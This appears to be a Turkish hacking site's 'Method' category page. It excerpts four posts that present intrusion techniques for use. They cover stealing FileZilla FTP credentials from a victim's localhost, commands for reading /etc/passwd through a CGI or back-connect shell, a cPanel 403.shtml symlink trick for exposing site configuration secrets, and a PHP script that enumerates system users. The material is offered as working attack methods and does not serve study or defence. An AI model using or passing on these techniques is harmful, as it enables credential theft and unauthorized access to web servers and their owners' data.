Kategori: Method

Localhost Filezilla Password’s Dump Method

Method tamamen tarafımızca kodlanmıştır. Düşünün ki webmaster veya sitesi olan kişiler tema veya scriptleri ilk öncelikle localhost’a kurarak denemektedir fakat kimse bilmez ki localhost bilgisayarda ki dosyalara erişim sağlamaktadır 🙂 Filezilla ise önceden girdiğiniz ftp hesaplarını last login olarak listelemektedir /AppData/Roaming/FileZilla/recentservers.xml dosyasında Localhost’a atacağımız dosyada kişinin bilgisayar adını @exec(“echo %username%”); komutu ile öğrendik Php ile…


Linux server bypass sufleleri/taktikler #1

/etc/passwd dizini olarak cgi yada back connect olduğunuz sunucudan hedef dosyayı nasıl çekebilirsiniz methodlar halinde göstereceğim; 1) ln -s /etc/passwd underfamily.txt -> cgi shell de kullanınız. 2) less +F /etc/passwd -> back connect olduğunuzda. 3) curl -O file:///etc/passwd -> cgi shell de kullanınız. 4) ln -s /etc/passwd README -> cgi shell de kullanınız. (HEADER –…


cPanel 403 forbidden bypass(.shtml)

cPanel crack ile cpanele erişim sağlayalım => TIKLA cPanelden hata sayfalarına girelim ve 403.shtml dosyasını açalım Shelle girelim komut yerine ln -s /home/underfamily/public_html/configuation.php 403.shtml yazalım Ardından 403.shtml dosyasını açtığımız bölüme F5 atarsak 403.shtml görüntülemede config bilgilerini görebilirsiniz.


/etc/passwd okuyan PHP (Secure serverlar için)

<?phpfor($uid=0;$uid<2000;$uid++){ // cat /etc/passwd $nothing = posix_getpwuid($uid); if (!empty($nothing)) { while (list ($key, $val) = each($nothing)){ print “$val:”; } print ““; } } ?> Php kodunu kullanmanız yeterli olucaktır /etc/passwd çekilmeyen çoğu sw de çalışmakta.